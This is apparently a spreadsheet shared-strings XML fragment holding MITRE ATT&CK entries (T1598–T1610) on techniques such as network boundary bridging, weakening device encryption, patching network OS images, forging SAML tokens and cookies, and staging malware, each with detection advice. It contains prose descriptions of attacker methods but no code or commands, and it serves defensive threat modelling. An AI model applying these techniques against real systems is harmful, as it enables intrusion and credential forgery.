  <si>
    <t>https://attack.mitre.org/techniques/T1598/002</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</si>
  <si>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t>
  </si>
  <si>
    <t>Phishing for Information: Spearphishing Link</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</si>
  <si>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closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1598/003</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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001).  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1599</t>
  </si>
  <si>
    <t>Consider monitoring network traffic on both interfaces of border network devices with out-of-band packet capture or network flow data, using a different device than the one in question.  Look for traffic that should be prohibited by the intended network traffic policy enforcement for the border network device.
Monitor the border network device’s configuration to validate that the policy enforcement sections are what was intended.  Look for rules that are less restrictive, or that allow specific traffic types that were not previously authorized.</t>
  </si>
  <si>
    <t>Firewall, Router ACL</t>
  </si>
  <si>
    <t>Network Boundary Bridging: Network Address Translation Traversal</t>
  </si>
  <si>
    <t>Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.
Network devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device.  A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)
When an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design.  In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device.  In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.  
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1599/001</t>
  </si>
  <si>
    <t>Consider monitoring network traffic on both interfaces of border network devices.  Compare packets transmitted by the device between networks to look for signs of NAT being implemented.  Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3.  In some cases, Port Address Translation (PAT) may also be used by an adversary.
Monitor the border network device’s configuration to determine if any unintended NAT rules have been added without authorization.</t>
  </si>
  <si>
    <t>Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.
Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1600</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that weaken encryption. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). Some detection methods require vendor support to aid in investigation.</t>
  </si>
  <si>
    <t>Encryption</t>
  </si>
  <si>
    <t>Weaken Encryption: Reduce Key Space</t>
  </si>
  <si>
    <t>Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.
Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1600/001</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.</t>
  </si>
  <si>
    <t>Weaken Encryption: Disable Crypto Hardware</t>
  </si>
  <si>
    <t>Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
Many network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1600/002</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that disable cryptographic hardware. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.</t>
  </si>
  <si>
    <t>Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it.  This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1601</t>
  </si>
  <si>
    <t>Most embedded network devices provide a command to print the version of the currently running operating system.  Use this command to query the operating system for its version number and compare it to what is expected for the device in question.  Because this method may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. 
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  (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)
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</si>
  <si>
    <t>Modify System Image: Patch System Image</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file.  Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.
To change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection.  The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.
To change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system.  This method typically requires administrative level access to the device.
In the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system.  Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory.  This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.
By modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599).  Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).
Adversaries may also compromise existing commands in the operating system to produce false output to mislead defenders.   When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system.  By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. 
When the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). 
When the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots.  However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1601/001</t>
  </si>
  <si>
    <t>Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source.  Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not.  Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)
Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory.  If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)</t>
  </si>
  <si>
    <t>Modify System Image: Downgrade System Image</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may install an older version of the operating system of a network device to weaken security.  Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)
On embedded devices, downgrading the version typically only requires replacing the operating system file in storage.  With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart.  The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.
Downgrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600).  Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1601/002</t>
  </si>
  <si>
    <t xml:space="preserve">Many embedded network devices provide a command to print the version of the currently running operating system.  Use this command to query the operating system for its version number and compare it to what is expected for the device in question.  Because image downgrade may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. </t>
  </si>
  <si>
    <t>Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1602</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks that solicits and obtains the configuration information of the queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)</t>
  </si>
  <si>
    <t>Data from Configuration Repository: SNMP (MIB Dump)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).
The MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.
Adversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1602/001</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks that expose MIB content or use unauthorized protocols.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)</t>
  </si>
  <si>
    <t>Data from Configuration Repository: Network Device Configuration Dump</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.
Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files. (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1602/002</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration. (Citation: US-CERT TA18-068A 2018)</t>
  </si>
  <si>
    <t>Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.
Adversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator)
Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1606</t>
  </si>
  <si>
    <t>17 December 2020</t>
  </si>
  <si>
    <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</si>
  <si>
    <t>Forge Web Credentials: Web Cookies</t>
  </si>
  <si>
    <t>Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.
Adversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.
Once forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1606/001</t>
  </si>
  <si>
    <t>20 September 2021</t>
  </si>
  <si>
    <t>Jen Burns, HubSpot</t>
  </si>
  <si>
    <t>Forge Web Credentials: SAML Tokens</t>
  </si>
  <si>
    <t>An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the &lt;code&gt;NotOnOrAfter&lt;/code&gt; value of the &lt;code&gt;conditions ...&lt;/code&gt; element in a token. This value can be changed using the &lt;code&gt;AccessTokenLifetime&lt;/code&gt; in a &lt;code&gt;LifetimeTokenPolicy&lt;/code&gt;.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1606/002</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</si>
  <si>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</si>
  <si>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Azure AD, Google Workspace, IaaS, Office 365, SaaS, Windows</t>
  </si>
  <si>
    <t>Blake Strom, Microsoft 365 Defender; Jen Burns, HubSpot; Oleg Kolesnikov, Securonix</t>
  </si>
  <si>
    <t>Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020)
Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):
* Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox)
* Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)
* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020)
* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Stage Capabilities: Upload Malware</t>
  </si>
  <si>
    <t>Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020)
Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/001</t>
  </si>
  <si>
    <t>If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
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</si>
  <si>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Kobi Haimovich, CardinalOps</t>
  </si>
  <si>
    <t>Stage Capabilities: Upload Tool</t>
  </si>
  <si>
    <t>Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo.
Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/002</t>
  </si>
  <si>
    <t>If infrastructure or patterns in tooling have been previously identified, internet scanning may uncover when an adversary has staged tools to make them accessible for targeting.
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</si>
  <si>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Stage Capabilities: Install Digital Certificate</t>
  </si>
  <si>
    <t>Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert)
Adversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers. 
Adversaries can obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) or create self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/003</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</si>
  <si>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or [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).</t>
  </si>
  <si>
    <t>Stage Capabilities: Drive-by Target</t>
  </si>
  <si>
    <t>Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).
Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)
Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack.
Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/004</t>
  </si>
  <si>
    <t>If infrastructure or patterns in the malicious web content utilized to deliver a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) have been previously identified, internet scanning may uncover when an adversary has staged web content for use in a strategic web compromise.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</si>
  <si>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Stage Capabilities: Link Target</t>
  </si>
  <si>
    <t>Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. 
Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.
Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/005</t>
  </si>
  <si>
    <t>If infrastructure or patterns in malicious web content have been previously identified, internet scanning may uncover when an adversary has staged web content to make it accessible for targeting.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003), [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002), or [Malicious Link](https://attack.mitre.org/techniques/T1204/001).</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1609</t>
  </si>
  <si>
    <t xml:space="preserve">Container administration service activities and executed commands can be captured through logging of process execution with command-line arguments on the container and the underlying host. In Docker, the daemon log provides insight into events at the daemon and container service level. Kubernetes system component logs may also detect activities running in and out of containers in the cluster. </t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; Brad Geesaman, @bradgeesaman; Center for Threat-Informed Defense (CTID); David Fiser, @anu4is, Trend Micro; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.
Containers can be deployed by various means, such as via Docker's &lt;code&gt;create&lt;/code&gt; and &lt;code&gt;start&lt;/code&gt; APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1610</t>
  </si>
  <si>
    <t>Defense Evasion, Execution</t>
  </si>
  <si>
    <t>Monitor for suspicious or unknown container images and pods in your environment. Deploy logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application pods to detect malicious activity at the cluster level. In Docker, the daemon log provides insight into remote API calls, including those that deploy containers. Logs for management services or applications used to deploy containers other than the native technologies themselves should also be monitored.</t>
